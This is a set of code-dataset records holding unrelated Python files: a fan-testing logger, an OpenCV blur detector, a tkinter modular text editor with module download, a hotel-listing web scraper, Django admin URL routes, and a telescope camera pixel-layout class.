datetime\n import os\n import csv\n \n while(1):\n RPM_AVG = []\n\n settings = start_sequence()\n\n FILE_OUTPUT_NAME = str(datetime.datetime.now().replace(microsecond=0))\n file_raw = open(\"/home/pi/Documents/FAN_DATA_FOLDER/\" + FILE_OUTPUT_NAME + \"_RAW\", 'w', newline='')\n\n if(os.path.exists(\"/home/pi/Documents/FAN_DATA_FOLDER/FILE_MAIN\")):\n file = open(\"/home/pi/Documents/FAN_DATA_FOLDER/FILE_MAIN\", 'a', newline = '')\n pass\n else:\n file = open(\"/home/pi/Documents/FAN_DATA_FOLDER/FILE_MAIN\", 'w', newline = '')\n writer = csv.writer(file)\n HEADER = [\"MODE\", \"REPETITION\", \"TIMESTAMP\", \"PWM\", \"RPM\"]\n writer.writerow(HEADER)\n \n if not settings:\n break\n else:\n 
while(message_display(\"\\nTo begin testing, press '1' and ENTER: \", '1') != 1):\n pass\n for i in range(0, len(settings[0])):\n RPM_AVG.append(main(i, settings[0][i], settings[1][i]))\n time.sleep(3)\n #while(message_display(\"To continue, press '2' and ENTER: \", '2') != 1):\n # pass\n display_results(RPM_AVG, settings)\n while(message_display(\"To continue, press '2' and ENTER: \", '2') != 1):\n pass","sub_path":"fan/fan_main.py","file_name":"fan_main.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"69676177","text":"from imutils import paths\nimport argparse\nimport cv2\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True, help=\"path to input directory of images\")\nap.add_argument(\"-t\", \"--threshold\", type=float, default=100.0, help=\"focus measures that fall below this value will be considered 'blurry'\")\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args[\"image\"])\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nfm = cv2.Laplacian(image, cv2.CV_64F).var()\ntext = \"Not Blurry\"\n\nif fm < args[\"threshold\"]: #keep tweeking the threshold as per your requirements\n text = \"Blurry\"\n\ncv2.putText(image, \"{}: {:.2f}\".format(text, fm), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 255), 3)\ncv2.imshow(\"Image\", image)\nkey = cv2.waitKey(0)\n","sub_path":"blurDetection.py","file_name":"blurDetection.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"537134006","text":"def is_parent(child, parent):\n return child == parent or any(map(lambda p: is_parent(p, parent), parents[child]))\n\n\nparents = {}\n\nfor _ in range(int(input())):\n a = input().split()\n parents[a[0]] = [] if len(a) == 1 else a[2:]\n \nexcepts = []\n\nfor _ in range(int(input())):\n excpt = input()\n \n for k in excepts:\n if is_parent(excpt, k):\n print(excpt)\n break\n \n excepts.append(excpt)\n\n\n","sub_path":"python basics and applications/2/2-1/2-1-2.py","file_name":"2-1-2.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"92693592","text":"import os.path\r\nimport sys\r\nimport json\r\nimport importlib\r\nimport tkinter\r\nimport tkinter.filedialog\r\nimport tkinter.messagebox\r\nimport urllib.request\r\n\r\nclass popupWindow:\r\n def __init__(self, root, text):\r\n top = self.top = tkinter.Toplevel(root)\r\n self.l = tkinter.Label(top, text=text)\r\n self.l.pack()\r\n self.e = tkinter.Entry(top)\r\n self.e.pack()\r\n self.b = tkinter.Button(top, text='Done', command=self.cleanup)\r\n self.b.pack()\r\n\r\n def cleanup(self):\r\n self.value = self.e.get()\r\n self.top.destroy()\r\n\r\nclass main:\r\n def __init__(self, root, textPad, menu):\r\n self.root = root\r\n self.textPad = textPad\r\n self.menu = menu\r\n self.name = \"Untitled\"\r\n self.root.title(\"Blu's Modular Editor 0.2.0: \" + self.name)\r\n\r\n self.filemenu = tkinter.Menu(self.menu)\r\n self.menu.add_cascade(label=\"File\", menu=self.filemenu)\r\n self.filemenu.add_command(label=\"New\", command=self.newCommand)\r\n self.filemenu.add_command(label=\"Open...\", command=self.openCommand)\r\n self.filemenu.add_command(label=\"Save\", command=self.saveCommand)\r\n self.filemenu.add_separator()\r\n self.filemenu.add_command(label=\"Restart\", command=self.restartCommand)\r\n 
self.filemenu.add_command(label=\"Exit\", command=self.exitCommand)\r\n\r\n self.helpmenu = tkinter.Menu(self.menu)\r\n self.menu.add_cascade(label=\"Help\", menu=self.helpmenu)\r\n self.helpmenu.add_command(label=\"About...\", command=self.aboutCommand)\r\n\r\n self.modulesmenu = tkinter.Menu(self.menu)\r\n self.menu.add_cascade(label=\"Modules\", menu=self.modulesmenu)\r\n self.modulesmenu.add_command(label=\"Download module\", command=self.downloadModuleCommand)\r\n self.modulesmenu.add_command(label=\"Load module\", command=self.loadModuleCommand)\r\n self.modulesmenu.add_command(label=\"Unload module\", command=self.unloadModuleCommand)\r\n\r\n self.path = os.path.dirname(os.path.abspath(__file__))\r\n\r\n def ret(self):\r\n return self.root, self.textPad, self.menu\r\n\r\n def newCommand(self):\r\n data = self.textPad.get('1.0', tkinter.END+'-1c')\r\n if data != \"\":\r\n if tkinter.messagebox.askokcancel(\"Discard\", \"Do you really want to discard unsaved changes?\"):\r\n self.textPad.delete('1.0', tkinter.END)\r\n\r\n def openCommand(self):\r\n data = self.textPad.get('1.0', tkinter.END+'-1c')\r\n if data != \"\":\r\n if tkinter.messagebox.askokcancel(\"Discard\", \"Do you really want to discard unsaved changes?\"):\r\n self.textPad.delete('1.0', tkinter.END)\r\n else:\r\n return\r\n file = tkinter.filedialog.askopenfile(parent=self.root,mode='rb',title='Select a file')\r\n if file != None:\r\n contents = file.read()\r\n self.textPad.insert('1.0', contents)\r\n self.name = file.name\r\n self.root.title(\"Blu's Modular Editor 0.2.0: \" + self.name)\r\n file.close()\r\n\r\n def saveCommand(self):\r\n file = tkinter.filedialog.asksaveasfile(mode='w')\r\n if file != None:\r\n # slice off the last character from get, as an extra return is added\r\n data = self.textPad.get('1.0', tkinter.END+'-1c')\r\n file.write(data)\r\n self.name = file.name\r\n self.root.title(\"Blu's Modular Editor 0.2.0: \" + self.name)\r\n file.close()\r\n\r\n def restartCommand(self):\r\n data = self.textPad.get('1.0', tkinter.END+'-1c')\r\n with open(os.path.join(self.path, \"..\", \"restart.tmp\"), \"w+\") as outfile:\r\n outfile.write(self.name + \"\\n\" + data)\r\n self.root.quit()\r\n\r\n def exitCommand(self):\r\n data = self.textPad.get('1.0', tkinter.END+'-1c')\r\n if data != \"\":\r\n if not tkinter.messagebox.askokcancel(\"Quit\", \"Do you really want to discard unsaved changes?\"):\r\n return\r\n self.root.destroy()\r\n\r\n def aboutCommand(self):\r\n tkinter.messagebox.showinfo(\"About\", \"A modular text editor by BluCode.\")\r\n\r\n def downloadModuleCommand(self):\r\n self.popup = popupWindow(self.root, \"Please enter the module name to add.\")\r\n self.root.wait_window(self.popup.top)\r\n self.popup.value = self.popup.value.lower()\r\n if self.popup.value != \"main\":\r\n redl = False\r\n try:\r\n with open(os.path.join(self.path, self.popup.value + \".py\"), \"r\") as _:\r\n if tkinter.messagebox.askyesno(\"Error\", \"This module has already been downloaded.\\nWould you like to re-download it?\"):\r\n redl = True\r\n raise FileNotFoundError\r\n except FileNotFoundError:\r\n try:\r\n urllib.request.urlretrieve(\"http://github.com/BluCodeGH/Editor/modules/\" + self.popup.value + \".py\", os.path.join(self.path, self.popup.value + \".py\"))\r\n if not redl:\r\n self.loadModuleCommand(self.popup.value)\r\n else:\r\n self.restartCommand()\r\n except urllib.request.URLError:\r\n tkinter.messagebox.showinfo(\"Error\", \"Invalid module name.\")\r\n else:\r\n try:\r\n 
urllib.request.urlretrieve(\"http://github.com/BluCodeGH/Editor/main.py\", os.path.join(self.path, \"..\", \"main.py\"))\r\n self.restartCommand()\r\n except urllib.request.URLError:\r\n tkinter.messagebox.showinfo(\"Error\", \"Something went wrong...\\nRIP\")\r\n\r\n def loadModuleCommand(self, module=None):\r\n if module is None:\r\n self.popup = popupWindow(self.root, \"Please enter the module name to load.\")\r\n self.root.wait_window(self.popup.top)\r\n module = self.popup.value\r\n if module in sys.modules.keys():\r\n tkinter.messagebox.showinfo(\"Error\", \"Module already loaded.\")\r\n return\r\n print(\"Trying to load module \" + module + \".\")\r\n try:\r\n pkg = importlib.import_module(\"modules.\" + module)\r\n self.root, self.textPad, self.menu = pkg.main(self.root, self.textPad, self.menu).ret()\r\n print(\"Updating modules file.\")\r\n with open(\"modules.json\", \"r\") as infile:\r\n modules = json.loads(infile.read())\r\n if module not in modules:\r\n modules.append(module)\r\n with open(\"modules.json\", \"w+\") as file:\r\n file.write(json.dumps(modules))\r\n print(\"Module loaded successfully.\")\r\n except ModuleNotFoundError:\r\n tkinter.messagebox.showinfo(\"Error\", \"Invalid module name.\")\r\n\r\n def unloadModuleCommand(self, module=None):\r\n if module is None:\r\n self.popup = popupWindow(self.root, \"Please enter the module name to unload.\")\r\n self.root.wait_window(self.popup.top)\r\n module = self.popup.value\r\n print(\"Updating modules file.\")\r\n with open(\"modules.json\", \"r\") as infile:\r\n modules = json.loads(infile.read())\r\n if module in modules:\r\n modules.remove(module)\r\n with open(\"modules.json\", \"w+\") as file:\r\n file.write(json.dumps(modules))\r\n print(\"Module unloaded successfully.\")\r\n self.restartCommand()\r\n else:\r\n tkinter.messagebox.showinfo(\"Error\", \"Module was never loaded.\")\r\n","sub_path":"modules/essentials.py","file_name":"essentials.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"495170829","text":"#project 2: web scrapping using beautifulSoup 4 and requests\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas\r\nimport argparse\r\nimport connect\r\n\r\nparser=argparse.ArgumentParser()\r\nparser.add_arguement(\"--page_num_max\", help=\"enter the number of pages to parse\", type=int)\r\nparser.add_arguement(\"--dbname\", help=\"Enter the name of db\", type=str)\r\nargs=parser.parse_args()\r\n\r\noyo_url =\"https://www.oyorooms.com/hotels-in-mumbai/?page=\"\r\npage_num_MAX=3\r\nscrapped_info_list=[]\r\nconnect.connect(args.dbname)\r\n\r\nfor page_num in range (1,page_num_MAX):\r\n url=oyo_url+ str(page_num)\r\n print(\"GET Requests for:\"+url)\r\n req= requests.get(url)\r\n content=req.content\r\n\r\n soup = BeautifulSoup(content,\"html.parser\")\r\n\r\n all_hotels = soup.find_all(\"div\",{\"class\":\"hotelCardListing\"})\r\n\r\n for hotel in all_hotels:\r\n hotel_dict = {}\r\n hotel_dict[\"name\"]=hotel.find(\"h3\",{\"class\":\"listingHotelDescription__hotelName\"}).text\r\n hotel_dict[\"address\"]=hotel.find(\"span\",{\"itemprop\":\"streetAddress\"}).text\r\n hotel_dict[\"price\"]=hotel.find(\"span\",{\"class\": \"listiingPrice__finalPrice\"}).text\r\n #try ... 
except\r\n try:\r\n hotel_dict[\"rating\"]=hotel.find(\"span\",{\"class\":\"hotelRating__ratingSummary\"}).text\r\n except AttributeError:\r\n hotel_dict[\"rating\"]=None\r\n parent_amenities_elements= hotel.find(\"div\",{\"class\":\"amenityWrapper\"})\r\n amenities_list=[]\r\n for amenity in parent_amenities_elements.find_all(\"div\",{\"class\":\"amenityWrapper__amenity\"}):\r\n amenities_list.append(amenity.find(\"span\", {\"class\":\"d-body-smd-textEllipsis\"}).text.strip())\r\n hotel_dict[\"amenities\"]=','.join(amenities_list[:-1])\r\n scrapped_info_list.append(hotel_dict)\r\n connect.insert_into_table(args.dbname,tuple(hotel_dict.value()))\r\n # print(hotel_name,hotel_address,hotel_price,hotel_rating)\r\ndataFrame = pandas.DataFrame(scrapped_info_list)\r\nprint(\"creating csv file...\")\r\ndataFrame.to_csv(\"Oyo.csv\")\r\nconnect.get_hotel_info(args.dbname)\r\n","sub_path":"webscrapping.py","file_name":"webscrapping.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"126535554","text":"from django.urls import path\nfrom .views import *\n\napp_name = 'admin_blog'\n\nurlpatterns = [\n path('listar_posts/', listar_posts, name='listar_posts'),\n path('editar_post/', editar_post, name='editar_post'),\n path('remover_post/', remover_post, name='remover_post'),\n path('cadastrar_post/', cadastrar_post, name='cadastrar_post'),\n\n]","sub_path":"admin_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"116146339","text":"import logging\n\nimport astropy.units as u\nimport matplotlib as mlp\nimport matplotlib.colors as mcolors\nimport matplotlib.patches as mpatches\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.collections import PatchCollection\nfrom scipy.spatial import cKDTree as KDTree\nfrom scipy.spatial import distance\n\nimport simtools.visualization.legend_handlers as leg_h\nfrom simtools.model.model_utils import (\n get_camera_name,\n get_telescope_class,\n is_two_mirror_telescope,\n)\nfrom simtools.util.general import rotate\n\n__all__ = [\"Camera\"]\n\n\nclass Camera:\n \"\"\"\n Camera class, defining pixel layout including rotation, finding neighbour pixels, calculating\\\n FoV and plotting the camera.\n\n Parameters\n ----------\n telescope_model_name: string\n As provided by the telescope model method TelescopeModel (ex South-LST-1).\n camera_config_file: string\n The sim_telarray file name.\n focal_length: float\n The focal length of the camera in (preferably the effective focal length), assumed to be \\\n in the same unit as the pixel positions in the camera_config_file, usually cm.\n \"\"\"\n\n # Constants for finding neighbour pixels.\n PMT_NEIGHBOR_RADIUS_FACTOR = 1.1\n SIPM_NEIGHBOR_RADIUS_FACTOR = 1.4\n SIPM_ROW_COLUMN_DIST_FACTOR = 0.2\n\n def __init__(self, telescope_model_name, camera_config_file, focal_length):\n \"\"\"\n Initialize Camera class, defining pixel layout including rotation, finding neighbour pixels,\n calculating FoV and plotting the camera.\n \"\"\"\n\n self._logger = logging.getLogger(__name__)\n\n self._telescope_model_name = telescope_model_name\n self._camera_name = get_camera_name(self._telescope_model_name)\n self._camera_config_file = camera_config_file\n self._focal_length = focal_length\n if self._focal_length <= 0:\n raise ValueError(\"The focal length must be larger than zero\")\n self._pixels = 
self.read_pixel_list(camera_config_file)\n\n self._pixels = self._rotate_pixels(self._pixels)\n\n # Initialize an empty list of neighbours, to be calculated only when necessary.\n self._neighbours = None\n\n # Initialize an empty list of edge pixels, to be calculated only when necessary.\n self._edge_pixel_indices = None\n\n @staticmethod\n def read_pixel_list(camera_config_file):\n \"\"\"\n Read the pixel layout from the camera config file, assumed to be in a sim_telarray format.\n\n Parameters\n ----------\n camera_config_file: string\n The sim_telarray file name.\n\n Returns\n -------\n dict: pixels\n A dictionary with the pixel positions, the camera rotation angle, the pixel shape, \\\n the pixel diameter, the pixel IDs and their \"on\" status.\n\n Notes\n -----\n The pixel shape can be hexagonal (denoted as 1 or 3) or a square (denoted as 2). \\\n The hexagonal shapes differ in their orientation, where those denoted as 3 are rotated\n clockwise by 30 degrees with respect to those denoted as 1.\n \"\"\"\n\n pixels = dict()\n pixels[\"pixel_diameter\"] = 9999\n pixels[\"pixel_shape\"] = 9999\n pixels[\"pixel_spacing\"] = 9999\n pixels[\"lightguide_efficiency_angle_file\"] = \"none\"\n pixels[\"lightguide_efficiency_wavelength_file\"] = \"none\"\n pixels[\"rotate_angle\"] = 0\n pixels[\"x\"] = list()\n pixels[\"y\"] = list()\n pixels[\"pix_id\"] = list()\n pixels[\"pix_on\"] = list()\n\n with open(camera_config_file, \"r\") as dat_file:\n for line in dat_file:\n pix_info = line.split()\n if line.startswith(\"PixType\"):\n pixels[\"pixel_shape\"] = int(pix_info[5].strip())\n pixels[\"pixel_diameter\"] = float(pix_info[6].strip())\n pixels[\"lightguide_efficiency_angle_file\"] = (\n pix_info[8].strip().replace('\"', \"\")\n )\n if len(pix_info) > 9:\n pixels[\"lightguide_efficiency_wavelength_file\"] = (\n pix_info[9].strip().replace('\"', \"\")\n )\n if line.startswith(\"Rotate\"):\n pixels[\"rotate_angle\"] = np.deg2rad(float(pix_info[1].strip()))\n if line.startswith(\"Pixel\"):\n pixels[\"x\"].append(float(pix_info[3].strip()))\n pixels[\"y\"].append(float(pix_info[4].strip()))\n pixels[\"pix_id\"].append(int(pix_info[1].strip()))\n if len(pix_info) > 9:\n if int(pix_info[9].strip()) != 0:\n pixels[\"pix_on\"].append(True)\n else:\n pixels[\"pix_on\"].append(False)\n else:\n pixels[\"pix_on\"].append(True)\n\n if pixels[\"pixel_diameter\"] == 9999:\n raise ValueError(f\"Could not read the pixel diameter from {camera_config_file} file\")\n if pixels[\"pixel_shape\"] not in [1, 2, 3]:\n raise ValueError(\n f\"Pixel shape in {camera_config_file} unrecognized (has to be 1, 2 or 3)\"\n )\n\n return pixels\n\n def _rotate_pixels(self, pixels):\n \"\"\"\n Rotate the pixels according to the rotation angle given in pixels['rotate_angle'].\n Additional rotation is added to get to the camera view of an observer facing the camera.\n The angle for the axes rotation depends on the coordinate system in which the original\n data was provided.\n\n Parameters\n ----------\n pixels: dictionary\n The dictionary produced by the read_pixel_list method of this class\n\n Returns\n -------\n pixels: dict\n The pixels dictionary with rotated pixels.\n The pixels orientation for plotting is added to the dictionary in pixels['orientation'].\n The orientation is determined by the pixel shape (see read_pixel_list for details).\n \"\"\"\n\n rotate_angle = pixels[\"rotate_angle\"] * u.rad # So not to change the original angle\n # The original pixel list is given such that\n # x -> North, y -> West, z -> Up in the 
ground system.\n # At azimuth=0, zenith angle=0 all coordinate systems are aligned.\n # When the telescope turns the \"normal\" way towards\n # the horizon, the x-axis points downwards, the y-axis points right\n # (when looking from the camera onto the dish),\n # and the z-axis points in any case from (primary) dish towards camera.\n # To get the camera for an observer facing the camera, need to rotate by 90 degrees.\n rotate_angle += (90 * u.deg).to(u.rad)\n\n self._logger.debug(f\"Rotating pixels by {rotate_angle.to(u.deg)} (clockwise rotation)\")\n\n if rotate_angle != 0:\n pixels[\"x\"], pixels[\"y\"] = rotate(pixels[\"x\"], pixels[\"y\"], rotate_angle)\n\n pixels[\"orientation\"] = 0\n if pixels[\"pixel_shape\"] == 1 or pixels[\"pixel_shape\"] == 3:\n if pixels[\"pixel_shape\"] == 3:\n pixels[\"orientation\"] = 30\n if rotate_angle > 0:\n pixels[\"orientation\"] -= rotate_angle.to(u.deg).value\n\n return pixels\n\n def get_number_of_pixels(self):\n \"\"\"\n Get the number of pixels in the camera (all pixels, including those defined as \"off\".\n\n Returns\n -------\n int\n number of pixels.\n \"\"\"\n\n return len(self._pixels[\"x\"])\n\n def get_pixel_diameter(self):\n \"\"\"\n Get pixel diameter contained in _pixels.\n\n Returns\n -------\n float\n Pixel diameter (usually in cm).\n \"\"\"\n\n return self._pixels[\"pixel_diameter\"]\n\n def get_pixel_active_solid_angle(self):\n \"\"\"\n Get the active solid angle of a pixel in sr.\n\n Returns\n -------\n float\n active solid angle of a pixel in sr.\n \"\"\"\n\n pixel_area = self.get_pixel_diameter() ** 2\n # In case we have hexagonal pixels:\n if self.get_pixel_shape() == 1 or self.get_pixel_shape() == 3:\n pixel_area *= np.sqrt(3) / 2\n return pixel_area / (self._focal_length**2)\n\n def get_pixel_shape(self):\n \"\"\"\n Get pixel shape code 1, 2 or 3, where 1 and 3 are hexagonal pixels, where one is rotated by\\\n 30 degrees with respect to the other. 
A square pixel is denoted as 2.\n\n Returns\n -------\n int (1, 2 or 3)\n Pixel shape.\n \"\"\"\n return self._pixels[\"pixel_shape\"]\n\n def get_lightguide_efficiency_angle_file_name(self):\n \"\"\"\n Get the file name of the light guide efficiency as a function of incidence angle.\n\n Returns\n -------\n str\n File name of the light guide efficiency as a function of incidence angle.\n \"\"\"\n\n return self._pixels[\"lightguide_efficiency_angle_file\"]\n\n def get_lightguide_efficiency_wavelength_file_name(self):\n \"\"\"\n Get the file name of the light guide efficiency as a function of wavelength.\n\n Returns\n -------\n str\n File name of the light guide efficiency as a function of wavelength.\n \"\"\"\n return self._pixels[\"lightguide_efficiency_wavelength_file\"]\n\n def get_camera_fill_factor(self):\n \"\"\"\n Calculate the fill factor of the camera, defined as (pixel_diameter/pixel_spacing)**2\n\n Returns\n -------\n float\n The camera fill factor.\n \"\"\"\n\n if self._pixels[\"pixel_spacing\"] == 9999:\n points = np.array([self._pixels[\"x\"], self._pixels[\"y\"]]).T\n pixel_distances = distance.cdist(points, points, \"euclidean\")\n self._pixels[\"pixel_spacing\"] = np.min(pixel_distances[pixel_distances > 0])\n\n return (self._pixels[\"pixel_diameter\"] / self._pixels[\"pixel_spacing\"]) ** 2\n\n def calc_fov(self):\n \"\"\"\n Calculate the FOV of the camera in degrees, taking into account the focal length.\n\n Returns\n -------\n fov: float\n The FOV of the camera in the degrees.\n average_edge_distance: float\n The average edge distance of the camera.\n\n Notes\n -----\n The x,y pixel positions and focal length are assumed to have the same unit (usually cm)\n \"\"\"\n\n self._logger.debug(\"Calculating the FoV\")\n\n return self._calc_fov(\n self._pixels[\"x\"],\n self._pixels[\"y\"],\n self.get_edge_pixels(),\n self._focal_length,\n )\n\n def _calc_fov(self, x_pixel, y_pixel, edge_pixel_indices, focal_length):\n \"\"\"\n Calculate the FOV of the camera in degrees, taking into account the focal length.\n\n Parameters\n ----------\n x_pixel: list\n List of positions of the pixels on the x-axis\n y_pixel: list\n List of positions of the pixels on the y-axis\n edge_pixel_indices: list\n List of indices of the edge pixels\n focal_length: float\n The focal length of the camera in (preferably the effective focal length), assumed to \\\n be in the same unit as the pixel positions.\n\n Returns\n -------\n fov: float\n The FOV of the camera in the degrees.\n average_edge_distance: float\n The average edge distance of the camera\n\n Notes\n -----\n The x,y pixel positions and focal length are assumed to have the same unit (usually cm)\n \"\"\"\n\n self._logger.debug(\"Calculating the FoV\")\n\n average_edge_distance = 0\n for i_pix in edge_pixel_indices:\n average_edge_distance += np.sqrt(x_pixel[i_pix] ** 2 + y_pixel[i_pix] ** 2)\n average_edge_distance /= len(edge_pixel_indices)\n\n fov = 2 * np.rad2deg(np.arctan(average_edge_distance / focal_length))\n\n return fov, average_edge_distance\n\n @staticmethod\n def _find_neighbours(x_pos, y_pos, radius):\n \"\"\"\n use a KD-Tree to quickly find nearest neighbours (e.g., of the pixels in a camera or mirror\\\n facets)\n\n Parameters\n ----------\n x_pos : numpy.array_like\n x position of each e.g., pixel\n y_pos : numpy.array_like\n y position of each e.g., pixel\n radius : float\n radius to consider neighbour it should be slightly larger than the pixel diameter or \\\n mirror facet.\n\n Returns\n -------\n neighbours: 
numpy.array_like\n            Array of neighbour indices in a list for each e.g., pixel.\n        \"\"\"\n\n        points = np.array([x_pos, y_pos]).T\n        indices = np.arange(len(x_pos))\n        kdtree = KDTree(points)\n        neighbours = [kdtree.query_ball_point(p, r=radius) for p in points]\n\n        for neighbour_now, index_now in zip(neighbours, indices):\n            neighbour_now.remove(index_now)  # get rid of the pixel or mirror itself\n\n        return neighbours\n\n    def _find_adjacent_neighbour_pixels(self, x_pos, y_pos, radius, row_column_dist):\n        \"\"\"\n        Find adjacent neighbour pixels in cameras with square pixels. Only directly adjacent \\\n        neighbours are allowed, no diagonals.\n\n        Parameters\n        ----------\n        x_pos : numpy.array_like\n            x position of each pixel\n        y_pos : numpy.array_like\n            y position of each pixel\n        radius : float\n            radius to consider neighbour.\n            Should be slightly larger than the pixel diameter.\n        row_column_dist : float\n            Maximum distance for pixels in the same row/column to consider when looking for a \\\n            neighbour. Should be around 20% of the pixel diameter.\n\n        Returns\n        -------\n        neighbours: numpy.array_like\n            Array of neighbour indices in a list for each pixel\n        \"\"\"\n\n        # First find the neighbours with the usual method and the original radius\n        # which does not allow for diagonal neighbours.\n        neighbours = self._find_neighbours(x_pos, y_pos, radius)\n        for i_pix, nn in enumerate(neighbours):\n            # Find pixels defined as edge pixels now\n            if len(nn) < 4:\n                # Go over all other pixels and search for ones which are adjacent\n                # but further than sqrt(2) away\n                for j_pix, _ in enumerate(x_pos):\n                    # No need to look at the pixel itself\n                    # nor at any pixels already in the neighbours list\n                    if j_pix != i_pix and j_pix not in nn:\n                        dist = np.sqrt(\n                            (x_pos[i_pix] - x_pos[j_pix]) ** 2 + (y_pos[i_pix] - y_pos[j_pix]) ** 2\n                        )\n                        # Check if this pixel is in the same row or column\n                        # and allow it to be ~1.68*diameter away (1.4*1.2 = 1.68)\n                        # Need to increase the distance because of the curvature\n                        # of the CHEC camera\n                        if (\n                            abs(x_pos[i_pix] - x_pos[j_pix]) < row_column_dist\n                            or abs(y_pos[i_pix] - y_pos[j_pix]) < row_column_dist\n                        ) and dist < 1.2 * radius:\n                            nn.append(j_pix)\n\n        return neighbours\n\n    def _calc_neighbour_pixels(self, pixels):\n        \"\"\"\n        Find adjacent neighbour pixels in cameras with hexagonal or square pixels. 
Only directly \\\n adjacent neighbours are searched for, no diagonals.\n\n Parameters\n ----------\n pixels: dictionary\n The dictionary produced by the read_pixel_list method of this class\n\n Returns\n -------\n neighbours: numpy.array_like\n Array of neighbour indices in a list for each pixel\n \"\"\"\n\n self._logger.debug(\"Searching for neighbour pixels\")\n\n if pixels[\"pixel_shape\"] == 1 or pixels[\"pixel_shape\"] == 3:\n self._neighbours = self._find_neighbours(\n pixels[\"x\"],\n pixels[\"y\"],\n self.PMT_NEIGHBOR_RADIUS_FACTOR * pixels[\"pixel_diameter\"],\n )\n elif pixels[\"pixel_shape\"] == 2:\n # Distance increased by 40% to take into account gaps in the SiPM cameras\n # Pixels in the same row/column can be 20% shifted from one another\n # Inside find_adjacent_neighbour_pixels the distance is increased\n # further for pixels in the same row/column to 1.68*diameter.\n self._neighbours = self._find_adjacent_neighbour_pixels(\n pixels[\"x\"],\n pixels[\"y\"],\n self.SIPM_NEIGHBOR_RADIUS_FACTOR * pixels[\"pixel_diameter\"],\n self.SIPM_ROW_COLUMN_DIST_FACTOR * pixels[\"pixel_diameter\"],\n )\n\n return self._neighbours\n\n def get_neighbour_pixels(self, pixels=None):\n \"\"\"\n Get a list of neighbour pixels by calling calc_neighbour_pixels() when necessary. The \\\n purpose of this function is to ensure the calculation occurs only once and only when \\\n necessary.\n\n Parameters\n ----------\n pixels: dict\n The dictionary produced by the read_pixel_list method of this class.\n\n Returns\n -------\n neighbours: numpy.array_like\n Array of neighbour indices in a list for each pixel.\n \"\"\"\n\n if self._neighbours is None:\n if pixels is None:\n pixels = self._pixels\n return self._calc_neighbour_pixels(pixels)\n\n return self._neighbours\n\n def _calc_edge_pixels(self, pixels, neighbours):\n \"\"\"\n Find the edge pixels of the camera.\n\n Parameters\n ----------\n pixels: dictionary\n The dictionary produced by the read_pixel_list method of this class.\n neighbours: numpy.array_like\n Array of neighbour indices in a list for each pixel.\n\n Returns\n -------\n edge_pixel_indices: numpy.array_like\n Array of edge pixel indices.\n \"\"\"\n\n self._logger.debug(\"Searching for edge pixels\")\n\n edge_pixel_indices = list()\n\n for i_pix, _ in enumerate(pixels[\"x\"]):\n if pixels[\"pixel_shape\"] == 1 or pixels[\"pixel_shape\"] == 3:\n if pixels[\"pix_on\"][i_pix]:\n if len(neighbours[i_pix]) < 6:\n edge_pixel_indices.append(i_pix)\n elif pixels[\"pixel_shape\"] == 2:\n if pixels[\"pix_on\"][i_pix]:\n if len(neighbours[i_pix]) < 4:\n edge_pixel_indices.append(i_pix)\n\n return edge_pixel_indices\n\n def get_edge_pixels(self, pixels=None, neighbours=None):\n \"\"\"\n Get the indices of the edge pixels of the camera.\n\n Parameters\n ----------\n pixels: dict\n The dictionary produced by the read_pixel_list method of this class.\n neighbours: numpy.array_like\n Array of neighbour indices in a list for each pixel.\n\n Returns\n -------\n edge_pixel_indices: numpy.array_like\n Array of edge pixel indices.\n \"\"\"\n\n if self._edge_pixel_indices is None:\n if pixels is None:\n pixels = self._pixels\n if neighbours is None:\n neighbours = self.get_neighbour_pixels()\n return self._calc_edge_pixels(pixels, neighbours)\n\n return self._edge_pixel_indices\n\n def _plot_axes_def(self, plot, rotate_angle):\n \"\"\"\n Plot three axes definitions on the pyplot.plt instance provided. 
The three axes are Alt/Az,\\\n the camera coordinate system and the original coordinate system the pixel list was provided.\n\n Parameters\n ----------\n plot: pyplot.plt instance\n A pyplot.plt instance where to add the axes definitions.\n rotate_angle: float\n The rotation angle applied\n \"\"\"\n\n invert_yaxis = False\n x_left = 0.7 # Position of the left most axis\n if not is_two_mirror_telescope(self._telescope_model_name):\n invert_yaxis = True\n x_left = 0.8\n\n x_title = r\"$x_{\\!pix}$\"\n y_title = r\"$y_{\\!pix}$\"\n x_pos, y_pos = (x_left, 0.12)\n # The rotation of LST (above 100 degrees) raises the axes.\n # In this case, lower the starting point.\n if np.rad2deg(rotate_angle) > 100:\n y_pos -= 0.09\n x_pos -= 0.05\n kwargs = {\n \"x_title\": x_title,\n \"y_title\": y_title,\n \"x_pos\": x_pos,\n \"y_pos\": y_pos,\n \"rotate_angle\": rotate_angle - (1 / 2.0) * np.pi,\n \"fc\": \"black\",\n \"ec\": \"black\",\n \"invert_yaxis\": invert_yaxis,\n }\n self._plot_one_axis_def(plot, **kwargs)\n\n x_title = r\"$x_{\\!cam}$\"\n y_title = r\"$y_{\\!cam}$\"\n x_pos, y_pos = (x_left + 0.15, 0.12)\n kwargs = {\n \"x_title\": x_title,\n \"y_title\": y_title,\n \"x_pos\": x_pos,\n \"y_pos\": y_pos,\n \"rotate_angle\": (3 / 2.0) * np.pi,\n \"fc\": \"blue\",\n \"ec\": \"blue\",\n \"invert_yaxis\": invert_yaxis,\n }\n self._plot_one_axis_def(plot, **kwargs)\n\n x_title = \"Alt\"\n y_title = \"Az\"\n x_pos, y_pos = (x_left + 0.15, 0.25)\n kwargs = {\n \"x_title\": x_title,\n \"y_title\": 